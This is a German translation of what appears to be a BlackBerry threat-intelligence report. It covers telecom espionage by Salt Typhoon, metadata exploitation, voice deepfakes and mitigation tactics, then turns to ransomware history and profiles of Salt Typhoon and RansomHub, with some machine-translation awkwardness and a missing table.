Aufgrund ihrer nahezu universellen Nutzung ist die moderne Telekommunikationsinfrastruktur heute mit einer noch nie dagewesenen Anzahl ausgeklügelter Bedrohungen konfrontiert, die auf ihre grundlegenden Funktionen und Datenströme abzielen. Von nationalstaatlichen Akteuren, die groß angelegte Spionage betreiben, bis hin zu cyberkriminellen Unternehmen, die "Abhören als Dienstleistung" anbieten, nutzen diese Bedrohungen die inhärenten Kompromisse zwischen globaler Konnektivität und Sicherheit in den öffentlichen Telekommunikationsnetzen der einzelnen Länder aus.
Da sich Unternehmen bei sensiblen Vorgängen zunehmend auf mobile und digitale Kommunikation verlassen, sind die Sicherheitslücken in diesen Netzwerken zu kritischen Schwachstellen geworden, die Wettbewerbsvorteile, strategische Pläne und vertrauliche Informationen gefährden können. Die jüngste Kaskade von Sicherheitsverletzungen bei Telekommunikationsanbietern zeigt, dass kein Unternehmen davon ausgehen kann, dass seine Kommunikation sicher ist, nur weil es die Standarddienste eines Anbieters nutzt.
Zu Beginn dieses Quartals gab AT&T eine große Sicherheitsverletzung bekannt, bei der Bedrohungsakteure die Anruf- und Textdaten seiner Mobilfunkkunden über einen längeren Zeitraum kompromittiert haben; wir wissen jetzt, dass mehrere Telekommunikationsunternehmen infiltriert wurden. Einige US-Regierungschefs sprachen von der "schlimmsten Sicherheitslücke in der Geschichte der Telekommunikation in unserem Land". Die Sicherheitsverletzung bei AT&T war von großer Bedeutung, da nicht nur AT&T-Kunden betroffen waren, sondern auch alle Personen weltweit, die während des betroffenen Zeitraums mit einem AT&T-Kunden kommuniziert haben. Die kompromittierten Daten enthielten potenziell wertvolle Metadaten über Kommunikationsmuster, den Zeitpunkt von Anrufen und Beziehungen zwischen Nutzern.
In diesem Abschnitt werden wir die verschiedenen Arten von Unternehmen untersuchen, die die Kommunikationsinfrastruktur bedrohen, die Taktiken, die sie anwenden, und die Abhilfemaßnahmen, die Unternehmen zum Schutz ihrer Daten ergreifen können.
Bedrohungsakteure
Nationale Akteure stellen eine erhebliche Bedrohung für die internationale Telekommunikationssicherheit dar, wie die jüngsten Ereignisse zeigen, bei denen mit der chinesischen Regierung verbundene Angreifer eine umfassende Cyber-Spionagekampagne durchführten. Diese raffinierten Akteure hatten es auf große Telekommunikationsunternehmen ab gesehen, um auf die Handydaten prominenter Persönlichkeiten, darunter auch US-Präsidentschaftskandidaten, zuzugreifen.
US-Regierungsbeamte gehen davon aus, dass ein als Salt Typhoon bekannter Bedrohungsakteur, der eng mit dem chinesischen Ministerium für Staatssicherheit verbunden ist, hinter der Telekommunikationsinfiltrationskampagne steckt. Ihre Operationen betrafen mehrere große Netzbetreiber, darunter Verizon, AT&T und T-Mobile, wobei die Ermittler feststellten, dass sie in diesen Netzen über ein Jahr lang unentdeckt geblieben waren.
Im Laufe der Zeit haben sich kriminelle Organisationen entwickelt, die hochspezialisierte Angriffsdienste im Telekommunikationssektor anbieten. Dazu gehören Organisationen, die "Call-Interception-as-a-Service" anbieten und "Wire-Tapping-as-a-Service"-Plattformen betreiben, deren Dienste über das Internet käuflich zu erwerben sind. Einige Bedrohungsakteure haben Fähigkeiten entwickelt, um Mobilfunkverbindungen für beliebige Telefonnummern umzuleiten und abzufangen, ohne dass der Endnutzer dies bemerkt.
Der Telekommunikationssektor ist auch mit Bedrohungen durch Gegner konfrontiert, die sich durch die Ausnutzung der Kommunikation Vorteile verschaffen wollen. Diese Akteure haben es auf hochrangige Personen und Organisationen abgesehen, die abgefangene Daten für Erpressungsversuche oder zur Aufdeckung vertraulicher Beziehungen nutzen, um das öffentliche Vertrauen in die Zielperson zu untergraben. Besonders besorgniserregend ist, dass sie in der Lage sind, hochrangige Unterstützer politischer Kandidaten, die sich aus der Öffentlichkeit heraushalten wollen, oder Personen, deren physische Sicherheit von ihrer Anonymität abhängt, wie Journalisten, Reporter und politische Aktivisten, zu identifizieren und möglicherweise bloßzustellen.
Identifizierte Bedrohungen
Die inhärenten Schwachstellen in Telekommunikationsnetzen können Unternehmen einem komplexen Netz von miteinander verbundenen Bedrohungen aussetzen. Öffentliche Telekommunikationsnetze zeichnen sich zwar durch ihre globale Erreichbarkeit aus, doch geht diese Zugänglichkeit mit Sicherheitsnachteilen einher, die böswillige Akteure ausnutzen können (und oft auch tun).
Vom direkten Abhören der Kommunikation bis hin zur ausgefeilten Analyse von Metadaten zielen diese Bedrohungen nicht nur auf den Inhalt der Kommunikation ab, sondern auch auf die Muster und Beziehungen, die sie offenbaren. Jüngste Sicherheitsverletzungen bei großen Telekommunikationsanbietern haben gezeigt, dass diese Bedrohungen nicht nur theoretischer Natur sind, sondern aktive Risiken für die Vertraulichkeit zwischen Arbeitgebern und Arbeitnehmern, Wettbewerbsvorteile und sogar die nationale Sicherheit darstellen. Einige dieser Risiken sind:
Abfangen von Kommunikation: Bedrohungsakteure können sowohl Audio-/Videoanrufe als auch SMS-Nachrichten abfangen und so die Kommunikation in Echtzeit belauschen. Viele der Risiken, die diese Schwachstellen für die Standardtelefonie darstellen, bestehen auch bei den kostenlosen Apps, die für Sprachanrufe und Nachrichten verwendet werden.
Ausbeutung von Metadaten: Bei der Metadatenauswertung sammeln und analysieren Bedrohungsakteure sowohl Call Detail Records (CDR) als auch Message Detail Records (MDR). Anhand dieser Daten können sie detaillierte Karten der Kontaktbeziehungen erstellen und Kommunikationsmuster wie Häufigkeit, Tageszeit und Anrufdauer analysieren. Die Echtzeiteinsicht in diese Metadaten ermöglicht es den Bedrohungsakteuren, die Teilnehmer einzelner Telekommunikationsunternehmen zu verfolgen und ausnutzbare Kommunikationsmuster zu identifizieren.
Ismael Valenzuela, Vice President of BlackBerry Threat Research and Intelligence, erklärt: "Telekommunikations-Metadaten können eine Goldgrube für Cyberkriminelle sein. Selbst wenn die Inhalte von Anrufen und Texten nicht durchsickern, kann das Wissen über den Kontext dieser Anrufe, z. B. wen eine Person anruft, wie oft und wann, leicht als Waffe eingesetzt werden. Bedrohungsakteure können herausfinden, wo Sie ungefähr wohnen, wo Sie arbeiten, mit wem Sie am häufigsten sprechen und sogar, ob Sie potenziell sensible Nummern anrufen, z. B. Gesundheitsdienstleister.
Identitätsbasierte Angriffe: Das Fehlen einer Identitätsüberprüfung in öffentlichen Netzen macht Identitäts- und Telefonnummernspoofing endemisch und fast unmöglich zu verhindern. Bedrohungsakteure können gestohlene Metadaten nutzen, um gezielt Telekommunikationsteilnehmer anzusprechen, indem sie Nummern fälschen, mit denen sie bereits kommuniziert haben. Diejenigen, die den Anruf entgegennehmen, werden höchstwahrscheinlich mit automatischen Anrufen konfrontiert, aber in einigen Fällen können die Angreifer neue Technologien wie Deep-Voice-Generatoren einsetzen, um komplexe Identitätsbetrügereien zu entwickeln.
Das Klonen der Stimme einer realen Person mit Hilfe der generativen KI wird als Audio-Depfake bezeichnet. Diese Art von Angriffen gewinnt in der Unternehmenswelt rapide an Bedeutung, da die Angreifer buchstäblich darauf angewiesen sind, dass die Mitarbeiter der Stimme einer ihnen bekannten Person - z. B. ihres Chefs - vertrauen und dieses Vertrauen missbrauchen, um Finanzbetrügereien mit hohen Summen durchzuführen.
Schwachstellen der Infrastruktur: Die moderne Telekommunikationsinfrastruktur birgt besonders schwierige Herausforderungen. Die Behebung von Schwachstellen erfordert häufig einen umfassenden Austausch von Systemkomponenten, was zu Dienstunterbrechungen führen kann und erhebliche Investitionen der Telekommunikationsanbieter erfordert.
- Veraltete Systemkomponenten: Kritische Teile des Telekommunikations-Backbones laufen immer noch auf Systemen aus den 1970er und 1980er Jahren, die vor den modernen Cybersicherheitsmaßnahmen entwickelt wurden und hauptsächlich für den Festnetzbetrieb konzipiert sind. Um diese veralteten Komponenten mit den aktuellen Sicherheitsmaßnahmen in Einklang zu bringen, müssten sie verstärkt werden, indem die Kommunikation über sichere Relais-Netzwerke geleitet und eine Ende-zu-Ende-Verschlüsselung implementiert wird, die sowohl den Dateninhalt als auch die Übertragungsmuster schützt.
- Netzzugangspunkte: Die Verbindungsprotokolle für Mobilfunk-Roaming enthalten inhärente Schwachstellen, die es böswilligen Akteuren ermöglichen, Mobilfunkverbindungen umzuleiten und abzufangen. Diese Schwachstelle besteht bei allen großen Netzbetreibern, darunter AT&T, Verizon und T-Mobile, wie die erfolgreiche Ausnutzung von Netzknotenpunkten bei mehreren Anbietern durch Salt Typhoon zeigt.
- Authentifizierungssysteme: Grundlegende Sicherheitskontrollen wie die Multi-Faktor-Authentifizierung fehlen in einigen kritischen Telekommunikationsinfrastrukturen ganz erheblich. Diese Lücke ermöglicht es Bedrohungsakteuren, einen dauerhaften Zugang aufrechtzuerhalten, sobald sie sich einmal Zugang verschafft haben.
- Überwachungssysteme: Die für legale Überwachungsmaßnahmen konzipierte "Lawful Intercept"-Infrastruktur kann kompromittiert werden, um sensible operative Daten über laufende Ermittlungen und Überwachungsziele offenzulegen.
- Datenübertragungsstellen: Die Verbindungen zwischen Internet-Diensteanbietern und Telekommunikationsnetzen schaffen zusätzliche Schwachstellen, an denen unverschlüsselte E-Mails und andere Mitteilungen abgefangen werden können.
- Globale Routing-Infrastruktur: Der grundlegende Aufbau von Telekommunikationsnetzen räumt der globalen Konnektivität Vorrang vor der Sicherheit ein, was zu inhärenten Schwachstellen bei der Weiterleitung von Anrufen und Daten zwischen Anbietern und über Regionen hinweg führt.
Sammeln von Informationen: Verstöße gegen die Telekommunikationsvorschriften sind für Bedrohungsakteure eine große Hilfe beim Sammeln von Informationen. Bedrohungsakteure können durchgesickerte Informationen nutzen, um bestimmte Teilnehmer in Echtzeit zu überwachen und in einigen Fällen versteckte Beziehungen zu erkennen. Im Rahmen politischer Kampagnen ermöglicht ihnen diese Überwachung, hochrangige Unterstützer zu entdecken, die versuchen, ihre Privatsphäre zu wahren und vertrauliche Verbindungen offenzulegen. Diese Informationen können zusätzliche Kommunikationsmuster aufdecken, die ebenfalls auf unerwartete Weise ausgenutzt werden können.
"Sie haben vielleicht das Gefühl, dass Sie nichts haben, was ein Angreifer wollen könnte", fügt Valenzuela hinzu, "aber allein das Wissen, wen Sie am häufigsten anrufen und wem Sie am ehesten vertrauen und deshalb einen Anruf annehmen würden, macht es Cyberkriminellen leichter, eine Vielzahl von telefonbasierten Betrügereien durchzuführen, einschließlich solcher, die sich auf gefälschte Audiodaten stützen, um die Stimme einer Ihnen bekannten Person vorzutäuschen.
Sekundäre Bedrohungen: Die Ausnutzung von Schwachstellen in der Telekommunikation kann zu sekundären Bedrohungen führen. Dazu gehören Erpressungsversuche, insbesondere wenn vertrauliche Beziehungen offengelegt werden. Außerdem können die kompromittierten Informationen zum Sammeln von Informationen und zur Spionage verwendet werden. Wenn eine hochrangige Person, Einrichtung oder Organisation kompromittiert wird, kann dies sogar demokratische Prozesse beeinträchtigen und die nationale Sicherheit bedrohen.
Laut David Wiseman, Vizepräsident von BlackBerry SecuSUITE®"Geheimnisse, die Wettbewerbsvorteile bieten - ob auf dem Markt oder auf dem Schlachtfeld - sind anfällig für die Preisgabe. Öffentliche Telekommunikationsnetze sind in erster Linie auf Zugänglichkeit ausgelegt, was oft zu Sicherheitslücken führt."
Ein wesentliches Problem bei öffentlichen Netzwerken, einschließlich verschlüsselter Messaging-Plattformen, ist ihr offener Charakter, der es praktisch jedem erlaubt, ihnen beizutreten. Wiseman erklärt: "Auf Plattformen wie Signal oder WhatsApp registrieren sich die Nutzer selbst, was zu Problemen wie Identitätsfälschung, Betrug und Bedenken über Fälschungen beiträgt. Offene Systeme mit Selbstregistrierung sind von Natur aus risikoreich".
Abhilfemaßnahmen
Um der sich ständig weiterentwickelnden Landschaft der Telekommunikationsbedrohungen zu begegnen, müssen Unternehmen umfassende Sicherheitsmaßnahmen einführen, die über eine einfache Verschlüsselung hinausgehen. Zwar bieten verbraucherfreundliche Kommunikationstools ein gewisses Maß an Schutz, doch reichen sie nicht aus, um ausgefeilte Angriffe auf Nachrichteninhalte und Metadaten abzuwehren.
Eine wirksame Verteidigung erfordert einen mehrschichtigen Ansatz, der technologische Lösungen mit strategischen Protokollen und menschlicher Wachsamkeit kombiniert. Die folgenden Strategien bieten einen Rahmen für Organisationen zum Schutz ihrer sensiblen Kommunikation vor nationalstaatlichen Akteuren, kriminellen Organisationen und anderen Bedrohungsakteuren, die versuchen, Schwachstellen in der Telekommunikation auszunutzen.
Authentifizierung und Identitätsüberprüfung: Multi-Faktor-Authentifizierung (MFA) und Identitätsüberprüfungsprotokolle dienen als wichtige erste Verteidigungslinie gegen unbefugten Zugriff und Social-Engineering-Angriffe.
- Taktik: Implementieren Sie robuste Authentifizierungssysteme und schulen Sie die Benutzer, unerwartete Mitteilungen über alternative oder sekundäre Kanäle zu verifizieren.
- Beispiel: Wenn eine Führungskraft außerhalb der normalen Geschäftszeiten eine dringende Nachricht von einem Vorstandsmitglied mit einer ungewöhnlichen Bitte erhält, befolgt sie das Protokoll, indem sie dies über einen separaten, vorher eingerichteten Kommunikationskanal überprüft.
Sicherheit von Links und Nachrichten: Social-Engineering-Angriffe nutzen das Vertrauen in bekannte Telefonnummern und Nachrichtenquellen aus, um bösartige Inhalte zu verbreiten.
- Taktik: Erstellen Sie strenge Protokolle für die Handhabung von Links und implementieren Sie Systeme, die den Inhalt von Nachrichten vor der Zustellung scannen und verifizieren.
- Beispiel: Ein Bankinstitut führt eine "No-Click"-Richtlinie für externe Links ein und verlangt, dass alle wichtigen Mitteilungen über die eigene sichere Plattform erfolgen.
Kontrolle der Infrastruktur: Unternehmen müssen ihre Kommunikationskanäle vollständig überwachen, um unbefugten Zugriff zu verhindern und Sicherheitsstandards einzuhalten.
- Taktik: Einsatz von Kommunikationssystemen, bei denen das Unternehmen die volle Kontrolle über Infrastruktur, Benutzerautorisierung und Sicherheitsprotokolle behält.
- Beispiel: Ein Rüstungsunternehmen führt ein geschlossenes Kommunikationssystem ein, bei dem alle Benutzer vorab autorisiert sein müssen und die gesamte Kommunikation über überwachte, sichere Kanäle läuft.
Schutz von Metadaten: Kommunikationsmuster und Metadaten können sensible Informationen preisgeben, selbst wenn der Inhalt der Nachricht sicher ist.
- Taktik: Verschlüsselung und Tunnelung aller Metadaten, einschließlich Anruferinformationen, Kommunikationsdauer und Beziehungsmuster zwischen Benutzern.
- Beispiel: Ein Finanzinstitut verhindert, dass Konkurrenten ihre Fusionsgespräche nachvollziehen können, indem es nicht nur die Kommunikation verschlüsselt, sondern auch die Muster, nach denen die Führungskräfte miteinander kommunizieren.
Verbesserung der mobilen Sicherheit: Die mobile Kommunikation stellt besondere Sicherheitsanforderungen, die spezielle kryptografische Lösungen erfordern.
- Taktik: Implementierung zertifizierter kryptografischer Authentifizierungen für die gesamte mobile Kommunikation, um Anrufspoofing, Betrug und unbefugten Zugriff zu verhindern.
- Beispiel: Eine Regierungsbehörde setzt mobile Geräte mit integrierter kryptografischer Authentifizierung ein, um sicherzustellen, dass die gesamte Kommunikation unabhängig vom Standort verifiziert und sicher ist.
Kontrolle über den Lebenszyklus von Daten: Herkömmliche Kommunikationssysteme geben die Kontrolle über die einmal freigegebenen Daten ab, was zu dauerhaften Sicherheitslücken führt.
- Taktik: Behalten Sie das organisatorische Eigentum an allen gemeinsam genutzten Daten bei und haben Sie jederzeit die Möglichkeit, den Zugriff zu widerrufen oder Inhalte zu löschen.
- Beispiel: Wenn eine Führungskraft ein Fortune-100-Unternehmen verlässt, wird der Zugriff auf alle zuvor gemeinsam genutzten Dokumente und Mitteilungen sofort gesperrt.
Social Engineering Defense: Grundlegendes menschliches Verhalten stellt oft die größte Sicherheitslücke in Kommunikationssystemen dar.
- Taktik: Implementieren Sie umfassende Schulungsprogramme, die von automatischen Systemen unterstützt werden, um Social-Engineering-Versuche zu erkennen und zu verhindern.
- Beispiel: Die sichere Kommunikationsplattform eines Unternehmens kennzeichnet automatisch alle ungewöhnlichen Kommunikationsmuster oder -anfragen und verlangt eine zusätzliche Überprüfung.
Integration der Risikobewertung: Die Sicherheitsmaßnahmen müssen auf die spezifischen Unternehmensrisiken und gesetzlichen Anforderungen zugeschnitten sein.
- Taktik: Bewerten Sie regelmäßig die Sicherheitsrisiken in der Kommunikation und passen Sie die Protokolle an neu auftretende Bedrohungen und Compliance-Anforderungen an.
- Beispiel: Ein Gesundheitsdienstleister führt vierteljährliche Bewertungen seiner Kommunikationssicherheitsmaßnahmen durch und aktualisiert die Protokolle auf der Grundlage neuer Bedrohungsdaten und gesetzlicher Änderungen.
Ganzheitliche Sicherheitsintegration: Die Kommunikationssicherheit muss in eine umfassendere Cybersicherheitsstrategie integriert werden.
- Taktik: Sicherstellen, dass sichere Kommunikation mit anderen Sicherheitsmaßnahmen und -protokollen zusammenarbeitet.
- Beispiel: Ein Fertigungsunternehmen integriert seine sichere Kommunikationsplattform mit seinen Zugangskontroll- und Data Loss Prevention-Systemen und schafft so eine einheitliche Sicherheit Ökosystem.
Temporäre Datenarchitektur: Eine dauerhafte Datenspeicherung erhöht die Anfälligkeit für Verstöße und unbefugten Zugriff.
- Taktik: Implementieren Sie Systeme, die die Datenpersistenz durch temporäre Speicherung und automatische Löschprotokolle minimieren.
- Beispiel: Die Kommunikationsplattform einer Anwaltskanzlei löscht automatisch Nachrichten von den Servern, unmittelbar nachdem sie allen berechtigten Empfängern zugestellt wurden.
In unserem Blog erfahren Sie mehr darüber, wie Bedrohungsakteure gestohlene Metadaten aus der mobilen Kommunikation nutzen und missbrauchen.
Die Gefahren von Deepfakes
Das FBI hat vor kurzem eine Warnung über Cyberkriminelle veröffentlicht, die generative KI nutzen, um groß angelegte Betrügereien zu begehen, die sich mit ausgeklügelten Betrügereien gegen Unternehmen und Finanzorganisationen richten. Das Gutachten warnt vor den Folgen von Deepfake-Videos und -Stimmenanrufen sowie KI-generierten Profilbildern, um sich als Personen auszugeben, die für Einstellungsbetrügereien verwendet werden können, wie z. B. die nordkoreanische Kampagne zur Infiltrierung westlicher IT-Unternehmen mit Spionen, die sich als Fernarbeiter ausgeben.
Diese neue, erweiterte Angriffsfläche für Cyberangriffe ist eine sehr reale Bedrohung für Unternehmen aller Größenordnungen, wobei die Verluste bis 2027 voraussichtlich 40 Milliarden US-Dollar erreichen werden. Shiladitya Sircar, Senior VP of Product Engineering and Data Science bei BlackBerry, erklärte kürzlich in einer Folge des PodcastsUnsupervised Learning von Daniel Miessler: "Diese Art von generativen KI Angreifern schafft mit all diesen multimodalen Informationen neue Angriffsvektoren, die niemand kommen sieht. Es entsteht eine komplexere, nuanciertere Bedrohungslandschaft, die identitätsgesteuerte Angriffe priorisiert, und es wird nur noch besser werden."
Die Auswirkungen auf die Unternehmen sind tiefgreifend. Wenn sich die Beteiligten nicht mehr auf die Authentizität der Kommunikation von Führungskräften verlassen können, ist jeder Aspekt der Geschäftstätigkeit betroffen - von marktbewegenden Ankündigungen bis hin zu internen strategischen Richtlinien. Der Banken- und Finanzdienstleistungssektor hat sich als Hauptangriffsziel herauskristallisiert und steht vor beispiellosen Herausforderungen bei der Aufrechterhaltung sicherer Kommunikations- und Transaktionsprüfungsprozesse. Sircar stellt fest: "Der besorgniserregendste Aspekt dieser Deepfakes ist das Potenzial, das Vertrauen zu untergraben - das Vertrauen in Systeme, die legitim sind, die wahr sind.
Vorausschauende Unternehmen positionieren sich bereits im Vorfeld neuer gesetzlicher Anforderungen, darunter der U.S. No KI Fraud Act und die kanadische Gesetzgebung zu nicht-konsensuellen Medien. Diese regulatorischen Entwicklungen signalisieren einen entscheidenden Wandel in der Art und Weise, wie Unternehmen Kommunikationssicherheit und Identitätsüberprüfung angehen müssen.
Mit der Verbesserung von Deep-Voice- und generativer KI Stimmveränderungssoftware ist es wahrscheinlich, dass diese Tools bei einer wachsenden Zahl gezielter Angriffe häufiger zum Einsatz kommen werden. Wenn Sie mehr über Deepfakes erfahren möchten, einschließlich Abhilfemaßnahmen, die Sie zum Schutz Ihres Unternehmens einsetzen können, können Sie unsere Whitepaper über Deepfakes hier herunterladen oder unsere vollständige Diskussion mit Shiladitya Sircar im Podcast über unüberwachtes Lernen anhören.
Wenn Sie glauben, dass Sie Opfer einer Deepfake-Betrugsmasche geworden sind, können Sie beim Internet Crime Complaint Center des FBI unter www.ic3.gov einen Bericht einreichen .
Rampenlicht für die Strafverfolgung
Historischer Hintergrund: Das Aufkommen von Ransomware-Gruppen
Die Ransomware Ökosystem hat sich seit dem ersten aufgezeichneten Angriff im Jahr 1989, als der AIDS-Trojaner veröffentlicht wurde, erheblich weiterentwickelt. Vor dem Aufkommen von Kryptowährungen im Jahr 2010 entwickelte sich Ransomware schrittweise. Die Bitcoin-Ära hat jedoch zu einem raschen Anstieg der Cyberbedrohungen geführt, insbesondere in den letzten sechs Monaten.
Im Jahr 2019 richteten Gruppen wie MAZE, Ryuk und Sodinokibi/REvil großen Schaden an, indem sie Computersysteme und Netzwerke verschlüsselten und Zahlungen für Entschlüsselungsschlüssel forderten. Dies war zu dieser Zeit eine effektive Angriffsstrategie, da nur wenige Unternehmen Systemsicherungen aufrechterhielten und noch weniger über Reaktionspläne für Cybervorfälle verfügten.
Die sich ständig weiterentwickelnde Ransomware-Bedrohung
In dieser Zeit wurden Ransomware-Operationen ähnlich wie traditionelle Gruppen des organisierten Verbrechens betrachtet: erfahrene Cyberkriminelle, die sich für eine gemeinsame Sache oder einen gemeinsamen Zweck zusammenschließen. Seitdem haben sich Ransomware-Gruppen zu sehr anpassungsfähigen Gegnern entwickelt, und mit der Verbesserung der Cybersicherheitspraktiken haben sich auch die Taktiken, Techniken und Verfahren (TTPs) der Ransomware-Betreiber verbessert.
Um den finanziellen Gewinn zu sichern, sind Ransomware-Gruppen von der einfachen Erpressung (nur Datenverschlüsselung) zur doppelten Erpressungstaktik übergegangen und verlangen Lösegeldzahlungen für den Entschlüsselungsschlüssel und zusätzlich, um zu verhindern, dass gestohlene Daten im Dark Web verkauft werden.
Auch die Zahl der Ransomware-Aktivitäten hat stetig zugenommen, wobei sich alte Gruppen umbenannt haben, neue Gruppen die Website Ökosystem betreten und neue Geschäftsmodelle entstehen. Ransomware-as-a-Service (RaaS) sowie schnellere Verschlüsselungsmethoden, bessere Verschleierungstechniken und die Möglichkeit, mehrere Betriebssysteme anzugreifen, sind einige der bemerkenswerten Fortschritte der letzten Jahre.
Während einige Ransomware-Operationen weiterhin Dateien und Systeme verschlüsseln, haben sich andere dafür entschieden, auf diesen Schritt zu verzichten und zu einem reinen Exfiltrationsmodell überzugehen. Diese Änderung des Ansatzes ist wahrscheinlich eine Reaktion auf die Einführung besserer Cybersicherheitspraktiken und die verstärkte Nutzung von Systemsicherungen und Notfallwiederherstellungsdiensten.
Ein drittes Element der Erpressung
In jüngster Zeit haben Ransomware-Operationen ein drittes Element der Erpressung hinzugefügt. Statt nur Daten zu exfiltrieren und damit zu drohen, sie online zu stellen, nehmen sich einige Ransomware-Betreiber die Zeit, die gestohlenen Daten zu analysieren und sie als Waffe einzusetzen, um den Druck auf Opfer zu erhöhen, die sich weigern zu zahlen. Diese Strategie kann die Weitergabe von Kontaktinformationen oder die Verbreitung von Drohungen an die Familienmitglieder von CEOs und Geschäftsinhabern beinhalten, sowie die Drohung, alle Informationen über illegale Geschäftsaktivitäten, die in den gestohlenen Daten aufgedeckt wurden, an die Behörden zu melden. Die Ransomware-Betreiber können damit drohen, Kunden oder Klienten zu kontaktieren oder, schlimmer noch, weitere Angriffe zu starten, wenn die Lösegeldforderungen nicht erfüllt werden.
Darüber hinaus hat das NC3 eine beträchtliche Anzahl neuer Ransomware-Varianten auftauchen sehen. Die Ransomware Ökosystem scheint aus heterogenen Gruppen von Personen zu bestehen, deren Fähigkeiten vom Social Engineering über die Vermittlung des Erstzugangs, fortgeschrittene Verschlüsselung, Malware-Entwicklung und Verhandlungen bis hin zur Öffentlichkeitsarbeit reichen. Die Ransomware Ökosystem ist ein kompliziertes, zusammenhängendes Netzwerk. Die Bekämpfung von Ransomware-Operationen erfordert einen ebenso komplexen, multidisziplinären Ansatz.
Herausforderungen bei der Strafverfolgung
Für die Strafverfolgungsbehörden stellt die kontinuierliche Entwicklung im Bereich Ransomware eine große Herausforderung dar, die innovative Lösungen erfordert. Ransomware ist eine der größten globalen Bedrohungen, und sie wird wahrscheinlich so lange bestehen bleiben, wie die Opfer zahlen.
Aus früheren Einsätzen der Strafverfolgungsbehörden gegen bekannte Ransomware-Gruppen wie Hive, BlackCat und LockBit wissen wir, dass Ransomware-Akteure ihre Taktiken schnell anpassen können, um die Bemühungen der Strafverfolgungsbehörden zu vereiteln. Diese Anpassungsbemühungen haben die Ransomware Ökosystem aufgesplittert und zwingen die Strafverfolgungsbehörden dazu, vielschichtige Strategien anzuwenden, die kreative Methoden zur Unterbrechung von Operationen beinhalten (z. B. Angriff auf Infrastruktur, Ruf und Vertrauen).
Die 10 größten kanadischen Ransomware-Bedrohungen
Das NC3 arbeitet eng mit nationalen und internationalen Strafverfolgungsbehörden, Regierungspartnern, der Privatwirtschaft und der Wissenschaft zusammen, um die Reaktion der kanadischen Strafverfolgungsbehörden auf Cyberkriminalität kontinuierlich zu verbessern. Das National Cybercrime Coordination Centre leistet nicht nur einen Beitrag zu spezifischen Strafverfolgungsmaßnahmen im Bereich der Cyberkriminalität und unterstützt diese, sondern beobachtet auch routinemäßig die Entwicklung der Cyberbedrohungslandschaft und führt alle drei Jahre eine Bewertung der Ransomware-Betreiber durch, die auf Kanada abzielen. Diese systematische Bewertung informiert die Cybersicherheitsbranche über Veränderungen in der Cyberkriminalität Ökosystem und hilft bei der Ausrichtung von Ermittlungsressourcen.
Die nachstehende Tabelle zeigt die häufigsten Ransomware-Bedrohungen in Kanada für den Berichtszeitraum von Mai bis August 2024, der sich mit dem Zeitraum dieses Berichts überschneidet.
-
Prominente Bedrohungsakteure
Dieser Abschnitt befasst sich mit der dynamischen Welt der Cyberbedrohungen und beginnt mit einer Analyse der wichtigsten Bedrohungsakteure.
-
Salt Typhoon
Salt Typhoon (auch bekannt als Earth Estries) ist ein hochentwickelter Bedrohungsakteur, der eng mit dem chinesischen Ministerium für Staatssicherheit (MSS) verbunden ist und im Jahr 2024 ins Rampenlicht der Öffentlichkeit getreten ist. Die Gruppe kompromittierte mehrere große US-amerikanische Telekommunikationsanbieter und Internetdienstleister, indem sie Hintertüren in ISP-Systemen ausnutzte, die ursprünglich für die gerichtlich genehmigte Einhaltung von Strafverfolgungsvorschriften implementiert worden waren. Die Gruppe hat bewiesen, dass sie in der Lage ist, sich langfristig zu tarnen und in diesem Fall über ein Jahr lang unentdeckt in Telekommunikationsnetzen zu bleiben.
Sobald sie sich innerhalb des Netzwerks festgesetzt hatten, erlangteSalt Typhoon Zugang zu umfangreichen Daten, einschließlich der Listen des US-Justizministeriums über rechtmäßige Abhörmaßnahmen, Anrufprotokolle, unverschlüsselte Textnachrichten, Audioaufnahmen und den Internetverkehr, der durch die Netzwerke der Anbieter fließt. Die Angriffe auf hochrangige US-Regierungsbeamte und politische Persönlichkeiten führten zu beispiellosen Maßnahmen, darunter eine Sitzung des Weißen Hauses mit Führungskräften der Telekommunikationsbranche und Warnungen von Bundesbehörden über die Nutzung von Mobilgeräten. Mitglieder des Kongresses im Repräsentantenhaus und im Senat haben ihre große Besorgnis über diese Vorfälle zum Ausdruck gebracht und die US-Bundesbehörden aufgefordert, weitere Informationen über die Angriffe zu liefern. Lesen Sie den Abschnitt über Kommunikationssicherheit, um einen detaillierteren Einblick in die Bedrohungen für kritische Infrastrukturen zu erhalten.
-
RansomHub
RansomHub (auch bekannt als Cyclops und Knight) arbeitet über ein RaaS-Modell und hat in letzter Zeit in der Bedrohungslandschaft erheblich an Bedeutung gewonnen. Die Effektivität und der Erfolg dieses Betriebsmodells hat mehrere bekannte Partner wie LockBit und ALPHV angezogen, die Netzwerkinfiltrationen und Datenexfiltrationen durchführen.
RansomHub arbeitet mit einem doppelten Erpressungsansatz. Die Gruppe wendet auch eine Reihe von Techniken an, um Endpunkt-Erkennungs- und Reaktionslösungen (EDR) zu deaktivieren oder zu beenden, so dass sie sich der Erkennung entziehen und eine ausgedehnte Präsenz in kompromittierten Netzwerken aufrechterhalten kann. Seit seinem Start im Februar 2024 hat sich RansomHub schnell ausgebreitet und Daten von über 210 Opfern aus kritischen Infrastrukturbereichen ins Visier genommen und exfiltriert. Durch dieses rasche Wachstum gehört RansomHub zu den erfolgreichsten Ransomware-Betreibern, was die Zahl der öffentlich gemeldeten Angriffe angeht. Zu den angegriffenen Branchen gehören:
Gesundheitswesen und Pharmazie
- Bedrohungsaktivität: Gezielte Ransomware-Angriffe auf Gesundheitsdienstleister und Apotheken
- Bemerkenswerte Auswirkungen: Rite Aid-Verletzung, von der 2,2 Millionen Kunden betroffen waren (Juli 2024)
- Kritische Bedenken: Diebstahl und Preisgabe sensibler Patientendaten, Unterbrechung von Rezeptverwaltungssystemen und Gefährdung geschützter Gesundheitsinformationen (PHI)
Energie und Industrie
- Bedrohungsaktivität: Anspruchsvolle Angriffe auf betriebliche Technologie- und Geschäftssysteme.
- Bemerkenswerte Auswirkungen: Störung der IT-Systeme eines Öl- und Gasdienstleisters (August 2024)
- Kritische Belange: Unterbrechung des Geschäftsbetriebs, Unterbrechung der Lieferkette, Gefährdung des Rechnungs- und Bestellsystems
Non-Profit-Organisationen und Gesundheitsdienste
- Bedrohungsaktivität: Datendiebstahlkampagnen, die auf sensible Unternehmensdaten abzielen
- Bemerkenswerte Auswirkungen: Planned Parenthood Montana (September 2024), Diebstahl vertraulicher Patientendaten und Unterbrechung des Betriebs
- Kritische Bedenken: Offenlegung vertraulicher Patientendaten, Verletzung der Privatsphäre und Rufschädigung
-
Spielen
